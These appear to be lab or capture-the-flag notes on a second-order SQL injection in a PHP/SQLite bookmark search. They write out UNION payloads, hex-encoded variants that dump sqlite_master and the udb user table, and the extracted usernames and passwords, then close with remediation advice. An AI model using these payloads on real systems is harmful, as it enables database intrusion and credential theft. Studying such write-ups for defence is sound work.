-
sql injection possible (double sql injection + sql injection with union)
-
\(sql = "SELECT id from tags where name like '%".htmlspecialchars(\)searchTag)."%'"; - php allows (despite htmlspecialchars, as it onles encodes single quotes when instructed) non-escaped single quote and the user input is put plainly into the sql statement
-
"SELECT title, url FROM `lookups` where tags like '%".$a[0]."%'"; - the first result of the previous statement is used to get the bookmarks
-
actual payload needs to be the result of the first query: union select + hex encoding
-
get all tables:
foo' union all select sql,sql from sqlite_master-- (sqlite database)
-
combined:
foo' union all select (select X'666f6f2720756e696f6e20616c6c2073656c6563742073716c2c73716c2066726f6d2073716c6974655f6d61737465722d2d') from sqlite_master--
-
user data stored in table
udb with columns username and userpass
-
get all users:
foo' union all select username,userpass from udb --
-
combined:
foo' union all select (select X'666f6f2720756e696f6e20616c6c2073656c65637420757365726e616d652c75736572706173732066726f6d20756462202d2d') from sqlite_master--
-
user pass
-
hacker10 h4ck.l34rn.
-
hans.juergen brotzeit
-
escape (sanitize) the user input
-
use prepared statements